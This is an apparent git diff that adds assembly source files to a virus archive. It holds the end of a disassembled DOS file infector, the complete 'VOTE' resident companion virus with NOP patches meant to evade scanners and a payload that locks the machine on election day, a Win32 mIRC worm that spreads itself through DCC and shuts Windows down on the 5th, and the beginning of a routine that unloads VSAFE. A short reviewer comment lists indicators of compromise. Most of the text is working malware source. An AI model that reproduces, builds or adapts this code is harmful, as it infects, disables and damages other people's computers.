equal + pop si + jmp short loc_4 + nop +loc_3: + mov di,28Ch + mov cx,4 + pop si + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + cmp cx,0 +loc_4: + pop es + pop di + pop si + pop dx + pop cx + pop bx + pop ax + jz loc_6 ; Jump if zero +loc_5: + push ax + inc ah + cmp ax,4C00h + pop ax + jnz loc_8 ; Jump if not zero +loc_6: + push ax + push bx + push cx + push dx + push si + push di + push es + push ds + jmp loc_16 +loc_7: + pop ds + pop es + pop di + pop si + pop dx + pop 
cx + pop bx + pop ax +loc_8: + popf ; Pop flags +;* jmp far ptr loc_49 + db 0EAh,0B5h, 02h, 46h,0D5h +loc_9: + mov ds,dx + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_1e,bx + db 3Eh, 8Ch, 06h,0C4h, 01h, 3Eh + db 89h, 1Eh, 75h, 03h, 3Eh, 8Ch + db 06h, 77h, 03h, 8Dh, 16h, 53h + db 01h,0B8h, 21h, 25h,0CDh + db 21h +loc_10: + pop dx + mov bx,offset data_18 + add bx,dx + cmp byte ptr cs:[bx],0 + je loc_12 ; Jump if equal + pop ds + mov ax,ds + push cs + pop ds + mov cx,dx + pop di + pop es + push ax + sub di,5 + mov si,offset data_17 + add si,cx + mov dl,[si] + add es:[di+5],dl + cmp es:[di+5],dl + ja loc_11 ; Jump if above + dec si + inc byte ptr [si] +loc_11: + mov dx,di + mov si,offset data_16 + add si,cx + mov cx,5 + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop ds + push es + push dx + mov ax,ds + mov es,ax + xor ax,ax ; Zero register + xor bx,bx ; Zero register + xor cx,cx ; Zero register + xor dx,dx ; Zero register + xor si,si ; Zero register + xor di,di ; Zero register + retf ; Return far +loc_12: + mov ax,cs + mov ds,ax + mov es,ax + mov si,268h + mov cx,100h + mov bx,281h + mov di,[bx] + cmp di,0 + jne loc_13 ; Jump if not equal + int 20h ; DOS program terminate +loc_13: + mov bx,283h + mov ax,[bx] + add di,ax + add di,100h + cld ; Clear direction + push di + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop di + mov cx,word ptr ds:[283h] + mov ax,word ptr ds:[281h] + push di + retn + add ax,100h + mov si,ax + mov di,100h + cld ; Clear direction + +locloop_14: + mov al,[si] + xor al,0BBh + mov [di],al + inc si + inc di + loop locloop_14 ; Loop if cx > 0 + + mov ax,offset start + pop bx + push ax + retn + inc ax + push es + inc ax + push es + push si + add ax,0E2Bh + inc bp + pop ax + inc bp + db 65h, 78h, 65h, 55h, 76h, 7Fh + db 'ctsqu`Voronezh,1990 2.01' +data_16 db 90h + db 0B8h, 7Fh, 0Eh, 8Eh +data_17 db 0 +data_18 db 0 +data_19 dw 200h +data_20 dw 14Dh +data_21 db 0, 0, 0, 0, 0 +data_22 dw 
0 +data_23 dw 34Dh +data_24 dw 0 +data_25 dw 5D0h +data_26 db 9Ah +data_27 dw 5D0h +data_28 dw 0 +data_29 dw 0 +data_30 dw 1Eh +data_31 dw 100h +data_32 dw 100h +data_33 db 5 +data_34 dw 20h +data_35 dw 0A956h +data_36 dw 41B9h + +loc_ret_15: + iret ; Interrupt return +loc_16: + mov bx,dx + mov ax,ds:[bx+3] + cmp ax,4F43h + jne $+5 ; Jump if not equal + jmp loc_7 +sub_1 endp + + mov di,dx + xor ax,ax ; Zero register + mov cs:data_33,0 + db 3Eh, 80h, 7Dh, 01h, 3Ah + db 75h, 09h, 3Eh, 8Ah, 05h, 24h + db 9Fh, 2Eh,0A2h,0CFh, 02h +loc_18: + mov ax,4300h + int 21h ; DOS Services ah=function 43h + ; get attrb cx, filename @ds:dx + mov cs:data_34,cx + mov cs:data_35,ds + mov cs:data_36,dx + push ds + push dx + push es + push cs + pop ds + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr ds:[285h],bx + mov word ptr ds:[287h],es + mov dx,offset loc_ret_15 + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop es + pop dx + pop ds + push ds + push cs + pop ds + mov bx,100h + mov cx,740h + sub cx,bx + mov bx,283h + mov [bx],cx + pop ds + mov bx,dx + push ds + push dx + push bx + push cs + pop ds + mov ah,36h ; '6' + mov dl,data_33 + int 21h ; DOS Services ah=function 36h + ; get drive info, drive dl,1=a: + ; returns ax=clust per sector + ; bx=avail clust,cx=bytes/sect + ; dx=clusters per drive + cmp ax,0FFFFh + jne loc_24 ; Jump if not equal +loc_23: + pop ax + pop ax + pop ax + call sub_3 + jmp loc_7 +loc_24: + mul bx ; dx:ax = reg * ax + mul cx ; dx:ax = reg * ax + or dx,dx ; Zero ? 
+ jnz loc_25 ; Jump if not zero + cmp ax,word ptr ds:[283h] + jb loc_23 ; Jump if below +loc_25: + pop bx + pop dx + pop ds + mov ax,3D00h + pushf ; Push flags + cli ; Disable interrupts +;* call far ptr sub_5 + db 9Ah,0B5h, 02h, 46h,0D5h + jnc loc_26 ; Jump if carry=0 + call sub_3 + jmp loc_7 +loc_26: + push ax + mov ax,cs + mov ds,ax + mov es,ax + pop ax + push ax + mov bx,ax + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + pop ax + push cx + push dx + push ax + mov bx,ax + mov cx,0 + mov dx,0 + mov ah,42h ; 'B' + mov al,2 + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov bx,281h + mov [bx],ax + mov bx,283h + mov cx,[bx] + mov cx,0 + mov dx,0 + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov bx,283h + mov cx,[bx] + pop bx + push bx + mov dx,offset data_37 + mov ah,3Fh ; '?' 
+ int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov si,offset data_37 + mov cx,[si] + cmp cx,0D88Ch + jne loc_27 ; Jump if not equal + pop bx + pop ax + pop ax + call sub_2 + jmp loc_7 +loc_27: + cmp cx,5A4Dh + je loc_28 ; Jump if equal + jmp loc_44 +loc_28: + pop bx + push bx + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,32h + mov ax,3F00h + lea dx,data_37 ; Load effective addr + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov ax,data_39 + mov cx,4 + mul cx ; dx:ax = reg * ax + mov bx,data_44 + add ax,bx + mov dx,ax + mov di,dx + mov ax,data_40 + mov cx,10h + mul cx ; dx:ax = reg * ax + mov dx,di + add dx,4 + cmp ax,dx + ja loc_29 ; Jump if above + jmp loc_43 +loc_29: + mov data_19,ax + mov ax,data_39 + inc ax + mov data_39,ax + mov ax,data_42 + mov data_20,ax + mov ax,data_43 + mov word ptr data_21,ax + xor dx,dx ; Zero register + xor cx,cx ; Zero register + mov ax,4202h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + push ax + push dx + add ax,word ptr ds:[283h] + cmp ax,word ptr ds:[283h] + ja loc_30 ; Jump if above + inc dx +loc_30: + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + cmp dx,0 + je loc_31 ; Jump if equal + inc ax +loc_31: + mov bx,data_38 + mov cx,ax + sub cx,bx + cmp cx,5 + jb loc_32 ; Jump if below + pop ax + pop ax + jmp loc_43 +loc_32: + mov data_38,ax + pop dx + pop ax + mov bx,data_19 + cmp ax,bx + jb loc_33 ; Jump if below + sub ax,bx + jmp short loc_34 + nop +loc_33: + sub ax,bx + dec dx +loc_34: + mov data_24,dx + mov data_25,ax + mov ax,data_19 + mov bx,data_20 + mov dx,0 + add ax,bx + cmp ax,bx + ja loc_35 ; Jump if above + inc dx +loc_35: + mov si,ax + mov di,dx + mov ax,word ptr data_21 + mov cx,10h + mul cx ; dx:ax = 
reg * ax + add di,dx + add si,ax + cmp si,ax + ja loc_36 ; Jump if above + inc di +loc_36: + mov ax,si + mov dx,di + mov data_22,dx + mov data_23,ax + mov cx,dx + mov dx,ax + mov ax,4200h + mov data_18,1 + mov data_17,0 + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,5 + lea dx,data_16 ; Load effective addr + mov ax,3F00h + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + cmp data_16,9Ah + jne loc_37 ; Jump if not equal + jmp loc_43 +loc_37: + call sub_4 + mov bx,data_44 + mov ax,data_39 + dec ax + mov cx,4 + mul cx ; dx:ax = reg * ax + add bx,ax + mov cx,0 + mov dx,bx + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov dx,data_20 + add dx,3 + mov data_20,dx + lea dx,data_20 ; Load effective addr + mov cx,4 + mov ah,40h ; '@' + pop bx + push bx + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov dx,data_20 + sub dx,3 + mov data_20,dx + xor dx,dx ; Zero register + xor cx,cx ; Zero register + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,data_44 + lea dx,data_37 ; Load effective addr + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov data_26,9Ah + mov ax,data_25 + mov data_27,ax + mov ax,data_24 + mov cx,1000h + mul cx ; dx:ax = reg * ax + mov data_28,ax + cmp data_27,0F000h + jb loc_38 ; Jump if below + mov ax,data_27 + mov dx,data_28 + add dx,100h + sub ax,1000h + mov data_28,dx + mov data_27,ax +loc_38: + mov cx,data_22 + mov dx,data_23 + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,5 + mov ah,40h ; '@' + lea dx,data_26 
; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov cx,0 + mov dx,0 + mov ax,4202h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ah,40h ; '@' + mov cx,word ptr ds:[283h] + mov dx,100h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + xor cx,cx ; Zero register + mov dx,data_44 + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov data_32,0 + mov data_29,dx + mov data_30,ax + mov ax,data_39 + mov di,0 + dec ax + cmp ax,0 + jne loc_39 ; Jump if not equal + jmp loc_43 +loc_39: + mov cx,4 + mul cx ; dx:ax = reg * ax + mov si,ax +loc_40: + mov cx,0 + mov dx,0 + mov ax,4201h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov data_29,dx + mov data_30,ax + mov cx,100h + mov dx,data_6e + mov ax,3F00h + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov di,data_6e + mov data_31,ax + add data_32,ax +loc_41: + mov ax,[di+2] + cmp ax,word ptr data_21 + jne loc_42 ; Jump if not equal + mov ax,[di] + cmp ax,data_20 + jb loc_42 ; Jump if below + mov ax,data_20 + add ax,5 + cmp ax,[di] + jbe loc_42 ; Jump if below or = + mov ax,data_28 + mov [di+2],ax + mov ax,[di] + mov bx,data_20 + sub ax,bx + push ax + mov ax,2AAh + sub ax,100h + mov bx,data_27 + add ax,bx + pop bx + add ax,bx + mov [di],ax + mov cx,data_29 + mov dx,data_30 + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,data_31 + mov ah,40h ; '@' + pop bx + push bx + mov dx,data_6e + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jmp short loc_43 + nop +loc_42: + add di,4 
+ mov ax,data_32 + sub ax,100h + add ax,di + cmp ax,si + je loc_43 ; Jump if equal + cmp di,data_31 + jb loc_41 ; Jump if below + jmp loc_40 +loc_43: + jmp short loc_48 + nop +loc_44: + mov cx,word ptr ds:[281h] + cmp cx,0EE48h + jb loc_46 ; Jump if below +loc_45: + pop bx + pop ax + pop ax + call sub_2 + jmp loc_7 +loc_46: + cmp cx,word ptr ds:[283h] + jb loc_45 ; Jump if below + call sub_4 + mov data_18,0 + mov dx,0 + mov cx,0 + mov ax,4202h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov si,283h + mov cx,[si] + mov ah,40h ; '@' + push cx + mov bx,offset data_37 + +locloop_47: + mov al,[bx] + xor al,0BBh + mov [bx],al + inc bx + loop locloop_47 ; Loop if cx > 0 + + pop cx + pop bx + push bx + mov dx,offset data_37 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ax,4200h + mov dx,0 + mov cx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov bx,110h + mov si,283h + mov cx,[si] + mov dx,100h + mov ah,40h ; '@' + pop bx + push bx + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_48: + pop bx + pop dx + pop cx + push bx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + mov dx,data_36 + mov ds,data_35 + mov ax,4301h + mov cx,cs:data_34 + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + push cs + pop ds + pop bx + call sub_2 + jmp loc_7 + +; +; SUBROUTINE +; + +sub_2 proc near + mov ax,3E00h + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + +; External Entry into Subroutine + +sub_3: + mov bx,word ptr ds:[285h] + mov es,word ptr ds:[287h] + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + retn +sub_2 endp + + +; +; SUBROUTINE +; + +sub_4 proc near + push bp + mov 
bp,sp
+ push ds
+ mov ax,4301h
+ mov dx,data_36
+ mov ds,data_35
+ xor cx,cx ; Zero register
+ int 21h ; DOS Services ah=function 43h
+ ; set attrb cx, filename @ds:dx
+ jnc $+8 ; Jump if carry=0
+ pop ds
+ pop bp
+ pop ax
+ jmp loc_43
+sub_4 endp
+
+ db 36h, 8Bh, 5Eh, 04h,0B8h, 00h
+ db 3Eh,0CDh, 21h,0B8h, 02h, 3Dh
+ db 0FAh, 9Ch, 2Eh,0FFh, 1Eh,0C2h
+ db 01h, 1Fh, 36h, 89h, 46h, 04h
+ db 5Dh,0C3h
+data_37 db 3
+ db 0BBh,0F7h, 76h
+data_38 dw 0BB9Ah
+data_39 dw 0BBBBh
+data_40 dw 0BBBBh
+ db 10 dup (0BBh)
+data_42 dw 0BBBBh
+data_43 dw 0BBBBh
+data_44 dw 0BBBBh
+ db 1574 dup (0BBh)
+
+seg_a ends
+
+
+
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.vote.asm b/MSDOS/Virus.MSDOS.Unknown.vote.asm
new file mode 100644
index 00000000..b980ea6c
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.vote.asm
@@ -0,0 +1,319 @@ +;**************************************************************************** +;* VOTE, SHITHEAD! virus Edited by URNST KOUCH for the Crypt Newsletter 7. +;* +;* TASM/MASM compatible source listing +;* +;* VOTE, SHITHEAD is a resident, companion virus based upon Little +;* Brother code and library .asm routines extracted from Nowhere Man's VCL. +;* It is also 'patched' with three 'nops' (they are commented) which +;* effectively blind a number of a-v scanners. This simple alteration +;* demonstrates a practical benefit of source code possession: quick +;* generation of different virus strains becomes a task within anyone's +;* reach. The only tools needed are a number of virus scanners and patience. +;* +;* In any case, the VOTE virus is just the ideal sample needed for +;* judicious virus action. It is a PERFECT tool for viral spreading for +;* a number of reasons. First, it is a FAST infector. Once resident +;* VOTE will create a companion file for ANY .EXE executed on ANY drive +;* and it will do it so quickly that most users, even suspicious ones, +;* will not notice any slowdown or glitches in machine operation. +;* Second, 'companion-ed' .EXE's will continue to load and function +;* properly when VOTE is resident. At the start of the day's computing, +;* the first 'companion-ed' .EXE executed will misfire ONCE as the virus +;* becomes resident. If it is re-called it will function perfectly. +;* Third, VOTE like the INSUFF viruses in the last newsletter strikes +;* directly at anti-virus suites vulnerable to 'spawning' infections (many +;* no-names, CPAV, NAV) and creates 'hidden' companion files, an improvement +;* over the original virus's modus operandi which left them out in plane +;* sight in the directory. Last, VOTE is very small. In RAM, it is not +;* discernible, taking up slightly less that 0.25k. Characteristically, +;* this is NOT reported by a mem /c display. 
In fact, +;* VOTE is almost invisible to any number of standard diagnostic +;* tests. Memory maps by QEMM and Norton's SYSINFO will +;* report INT 21 hooked differently. But unless the user can compare +;* an uncontaminated INTERRUPT report with one when the virus IS present, +;* it's unlikely he'll know anything is different. Even then, VOTE is hard +;* to notice. +;* +;* On election day, November 3rd, VOTE will lock an infected machine into +;* a loop as it displays a "DID YOU VOTE, SHITHEAD??" query repetitively +;* across the monitor. Computing will be impossible on Nov. 3rd +;* unless VOTE is removed from the machine, a task accomplished by unmasking +;* all the hidden .COMfiles and deleting them while +;* the virus is NOT resident. At all other times, VOTE is almost completely +;* transparent. +;**************************************************************************** + +code segment + assume cs:code,ds:code,es:nothing + + .RADIX 16 + + +oi21 equ endit +nameptr equ endit+4 +DTA equ endit+8 + + +;**************************************************************************** +;* Check for activation date, then proceed to installation! +;**************************************************************************** + + org 100h + +begin: + call get_day ; Get the day, DOS time/date grab + cmp ax,0003h ; Did the function return the 3rd? + jne realstrt ; If equal, continue along stream + call get_month ; Get the month, DOS time/date grab + cmp ax,000Bh ; Did the function return November (11)? 
+ jne realstrt ; If equal, continue to blooie; if not + ; skip to loading of virus + + +blooie: mov dx, offset shithead ;load 'shithead' message + mov ah,9 ;display it and loop + int 21h ;endlessly until + jmp blooie ;user becomes ill and reboots + +realstrt: mov ax,0044h ;move VOTE SHITHEAD to empty hole in RAM + nop ;a 'nop' to confuse tbSCAN + mov es,ax + nop ;a 'nop' to confuse Datatechnik's AVscan + mov di,0100h + mov si,di + mov cx,endit - begin ;length of SHITHEAD into cx + rep movsb + + mov ds,cx ;get original int21 vector + mov si,0084h + mov di,offset oi21 + mov dx,offset ni21 + lodsw + cmp ax,dx ;check to see if virus is around + je cancel ; by comparing new interrupt (ni21) + stosw ; vector to current, if it looks + movsw ; the same 'cancel' operation + + push es ;set vector to new handler + pop ds + mov ax,2521h + int 21h + +cancel: ret + + +;**************************************************************************** +;* File-extension masks for checking and naming routines;message text +;**************************************************************************** + +EXE_txt db 'EXE',0 +COM_txt db 'COM',0 +SHITHEAD db "DID YOU VOTE, SHITHEAD??" 
+ db 07h,07h,'$' + +;**************************************************************************** +;* Interrupt handler 24 +;**************************************************************************** + +ni24: mov al,03 ;virus critical error handler + iret ;prevents embarrassing messages + ;on attempted writes to protected disks + +;**************************************************************************** +;* Interrupt handler 21 +;**************************************************************************** + +ni21: pushf + + push es + push ds + push ax + push bx + push dx + + cmp ax,4B00h ;now that we're installed + jne exit ; check for 4B00, DOS excutions + +doit: call infect ; if one comes by, grab it + +exit: pop dx ; if anything else, goto sleep + pop bx + pop ax + pop ds + pop es + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + + +;**************************************************************************** +;* Try to infect a file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov word ptr cs:[nameptr],dx ;save the ptr to the filename + mov word ptr cs:[nameptr+2],ds + + mov ah,2Fh ;get old DTA + int 21 + push es + push bx + + push cs ;set new DTA + + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21 + + call searchpoint ; here's where we grab a name + push di ; for ourselves + mov si,offset COM_txt ;is extension 'COM'? + + mov cx,3 + rep cmpsb + pop di + jz do_com ;if so, go to our .COM routine + + mov si,offset EXE_txt ;is extension 'EXE'? + nop ;'nop' to confuse SCAN v85b. 
+ mov cl,3 + rep cmpsb + jnz return + +do_exe: mov si,offset COM_txt ;change extension to COM + nop ;another 'nop' to confuse SCAN + call change_ext + + mov ax,3300h ;get ctrl-break flag + nop + int 21 + push dx + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vector to new handler + pop ds ;virus handles machine + mov dx,offset ni24 ;exits on attempted writes + mov ah,25h ;to write-protected disks + push ax + int 21 + + lds dx,dword ptr [nameptr] ;create the virus (with name of .EXE target) + mov ah,03Ch ; DOS create file function + mov cx,00100111b ; CX holds file attributes (all) + int 021h ; makes it hidden/system/read-only + ; do it + xchg bx,ax ;save handle + + push cs + pop ds + mov cx,endit - begin ; write the virus to the created file + mov dx,offset begin ; CX contains length + mov ah,40h ; write to file function + int 21 + + mov ah,3Eh ;close the file + int 21 + + +return1: pop ax ;restore int24 vector + pop ds + pop dx + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + mov si,offset EXE_txt ;change extension to EXE + call change_ext ;execute EXE-file + +return: mov ah,1Ah ;restore old DTA + pop dx + pop ds + int 21 + + ret + +do_com: call findfirst ;is the COM-file a virus? + cmp word ptr cs:[DTA+1Ah],endit - begin ;compare it to virus length + jne return ;no, so execute COM-file + mov si,offset EXE_txt ;does the EXE-variant exist? 
+ call change_ext + call findfirst + jnc return ;yes, execute EXE-file + mov si,offset COM_txt ;change extension to COM + call change_ext + jmp short return ;execute COM-file + +;**************************************************************************** +;* Search beginning of extension for name we will usurp +;**************************************************************************** + +searchpoint: les di,dword ptr cs:[nameptr] + mov ch,0FFh + mov al,0 + repnz scasb + sub di,4 + ret + +;**************************************************************************** +;* Change the extension of the filename (CS:SI -> ext) +;**************************************************************************** + +change_ext: call searchpoint + push cs + pop ds + movsw + movsw + ret + + + +;**************************************************************************** +;* Find the file +;**************************************************************************** + +findfirst: lds dx,dword ptr [nameptr] + mov cl,27h + mov ah,4Eh + int 21 + ret + +;**************************************************************************** +;* Get the day off the system for activation checking +;**************************************************************************** +get_day: + mov ah,02Ah ; DOS get date function + int 021h + mov al,dl ; Copy day into AL + cbw ; Sign-extend AL into AX + ret ; Get back to caller +;************************************************************************* +;* Get the month off the system for activation checking +;************************************************************************* + +get_month: + mov ah,02Ah ; DOS get date function + int 021h + mov al,dh ; Copy month into AL + cbw ; Sign-extend AL into AX + ret ; Get back to caller + + +endit: + +code ends + end begin + diff --git a/MSDOS/Virus.MSDOS.Unknown.voyager.asm b/MSDOS/Virus.MSDOS.Unknown.voyager.asm new file mode 100644 index 00000000..3b2ce20d --- /dev/null 
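Review bot: The file's long prose header describes the sample's behaviour but nowhere summarises the host-observable artefacts an analyst needs to recognise and clean it, which is the documentation a corpus sample is missing most. From the code itself: the resident copy is placed at the fixed segment 0044h (`mov ax,0044h` / `mov es,ax` in realstrt) and the INT 21h vector read from 0:0084h is redirected to ni21, which only acts on `cmp ax,4B00h`; each companion is created with attributes 27h (`mov cx,00100111b`, i.e. read-only, hidden, system and archive bits) and is exactly `endit - begin` bytes long, the same length do_com uses at `cmp word ptr cs:[DTA+1Ah],endit - begin` to recognise its own files; the payload keys off `get_day` returning 3 and `get_month` returning 0Bh. I would add a short header comment block near `begin:` listing these indicators (memory location and hooked vector/function, companion attributes and fixed size, trigger date) so detection and removal can be derived without reading through the handler.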
+++ b/MSDOS/Virus.MSDOS.Unknown.voyager.asm 
@@ -0,0 +1,214 @@
+
+;
+; VOYAGER.mIRC.Worm.Win32
+; by Bumblebee/[Hail and Kill]
+;
+; . This is a simple mIRC worm. Creates -if not exists- a directory
+; called 'C:\Temp' and stores there 'Voyager.exe'. Then searches for
+; mIRC in 'c:\mirc' and 'c:\mirc32'. If mIRC is found then deletes
+; the 'script.ini' and writes its own script.
+;
+; . Sets to 'Voyager.exe' read-only and hidden attributes.
+; . ExitWindows if Voyager is executed in payload date.
+;
+; . Is a Win32 program -only uses API- and due to this it must work
+; fine under Win95/Win98/WinNT. Is small but -fucking windows- its
+; size is 4096 bytes long.
+;
+; tasm /ml /m3 v32,,;
+; tlink32 -Tpe -c v32,v32,, import32.lib
+;
+
+.386
+locals
+jumps
+.model flat,STDCALL
+
+ ; procs to import
+ extrn CreateFileA:PROC
+ extrn WriteFile:PROC
+ extrn CloseHandle:PROC
+ extrn DeleteFileA:PROC
+ extrn ExitProcess:PROC
+ extrn GetCommandLineA:PROC
+ extrn GetCurrentDirectoryA:PROC
+ extrn SetCurrentDirectoryA:PROC
+ extrn CreateDirectoryA:PROC
+ extrn VirtualAlloc:PROC
+ extrn CopyFileA:PROC
+ extrn SetFileAttributesA:PROC
+ extrn GetSystemTime:PROC
+ extrn ExitWindowsEx:PROC
+
+virusSize equ 4096
+scriptSize equ endScript-mIRCScript
+
+.DATA
+ db 0dh,0ah
+id db 'VOYAGER.mIRC.Worm.Win32 by Bumblebee/[Hail and Kill]',0
+ db 0dh,0ah
+
+scriptName db 'Script.ini',0
+virusDir db 'C:\Temp',0
+destVir db 'C:\Temp\Voyager.exe',0
+mIRCScript db '[SCRIPT]',0,0dh,0ah
+ db 'n0=on 1:TEXT:*sting*:#:/msg $chan VOYAGER.mIRC.Worm.Win32'
+ db ' by Bumblebee/[Hail and Kill] at your service!',0
+ db 0dh,0ah
+ db 'n1=on 1:TEXT:*bee*:#:/msg $chan The way of the bee!',0
+ db 0dh,0ah
+ db 'n2=on 1:FILESENT:*.*:/if ( $me != $nick ) { /dcc send'
+ db ' $nick c:\temp\voyager.exe }',0,0dh,0ah
+endScript db 0
+
+mIRCDir0 db 'c:\mirc',0
+mIRCDir1 db 'c:\mirc32',0
+
+fHnd dd ?
+cdirHnd dd ?
+commandLine dd ?
+size2Read dd 0
+
+sysTimeStruct db 16 dup(0)
+
+.CODE
+
+inicio:
+
+ call GetCommandLineA ; get command line
+ mov dword ptr [commandLine],eax
+
+skipArgs: ; skip args
+ cmp dword ptr [eax],'EXE.'
+ je argsOk
+ inc eax
+ jmp skipArgs
+argsOk:
+ add eax,4
+ mov byte ptr [eax],0
+
+ push 00000004h ; read/write page
+ push 00001000h ; mem commit (reserve phys mem)
+ push 1024 ; size to alloc
+ push 0h ; let system decide where to alloc
+ call VirtualAlloc
+ cmp eax,0
+ je goOut ; ops... not memory to alloc?
+ mov dword ptr [cdirHnd],eax
+
+ push dword ptr [cdirHnd] ; get current directory
+ push 1024
+ call GetCurrentDirectoryA
+ cmp eax,0
+ je goErrOut
+
+goDir:
+ lea eax,virusDir
+ push eax
+ call SetCurrentDirectoryA
+ cmp eax,0
+ jne skipCreateDir ; directory exists
+
+ xor eax,eax
+ push 0
+ lea eax,virusDir
+ push eax
+ call CreateDirectoryA ; create the directory
+ cmp eax,0
+ je goOut
+ jmp goDir
+
+skipCreateDir:
+
+ push 0 ; overwrite if exists
+ lea eax,destVir
+ push eax
+ push dword ptr [commandLine]
+ call CopyFileA ; install Voyager into c:\Temp
+ cmp eax,0
+ je mIRCCheck
+
+ push 00000001h OR 00000002h ; set read only and hidden
+ lea eax,destVir
+ push eax
+ call SetFileAttributesA ; set voyager new attributes
+
+mIRCCheck:
+ lea eax,mIRCDir0
+ push eax
+ call SetCurrentDirectoryA
+ cmp eax,0
+ je installScript ; directory exists -> mIRC found!
+
+ lea eax,mIRCDir1
+ push eax
+ call SetCurrentDirectoryA
+ cmp eax,0
+ jne goOut ; directory exists -> mIRC found!
+
+installScript:
+
+ lea eax,scriptName
+ push eax ; delete script.ini
+ call DeleteFileA
+
+ xor eax,eax
+ push eax
+ push 00000020h ; archive
+ push 1
+ push eax
+ push 00000001h OR 00000002h
+ push 40000000h
+ lea eax,scriptName
+ push eax
+ call CreateFileA ; open new script for write (shared)
+ cmp eax,-1
+ je goOut
+
+ mov dword ptr [fHnd],eax
+
+ push 0
+ mov dword ptr [size2Read],0
+ lea eax,size2Read
+ push eax
+ mov eax,scriptSize
+ push eax
+ lea eax,mIRCScript
+ push eax
+ push dword ptr [fHnd]
+ call WriteFile ; write script.ini
+
+ mov eax,dword ptr [fHnd] ; close file
+ push eax
+ call CloseHandle
+
+
+goOut:
+ push dword ptr [cdirHnd] ; restore work directory
+ call SetCurrentDirectoryA
+
+goErrOut:
+
+ lea eax,sysTimeStruct ; check for payload
+ push eax
+ call GetSystemTime
+
+ lea eax,sysTimeStruct ; 5th day of month?
+ cmp word ptr [eax+6],5
+ jne exitLoop
+
+ xor eax,eax
+ mov eax,1
+ or eax,4
+ push eax
+ push eax
+ call ExitWindowsEx ; close windows ;)
+
+exitLoop:
+ push 0h ; exit
+ call ExitProcess
+ jmp exitLoop
+
+Ends
+End inicio
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.vslay.asm b/MSDOS/Virus.MSDOS.Unknown.vslay.asm
new file mode 100644
index 00000000..150873df
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.vslay.asm
@@ -0,0 +1,19 @@
+;VSLAY - simple de-install Microsoft Antivirus VSAFE
+;demonstration code for Crypt Newsletter 16
+
+ code segment
+ assume cs:code, ds:code, es:code, ss:nothing
+
+ org 100h
+
+begin: call vslay
+
+
+vslay:
+ mov ax,64001 ;wakes up VSAFE to keyboard input
+ mov dx,5945h ;asks VSAFE to de-install
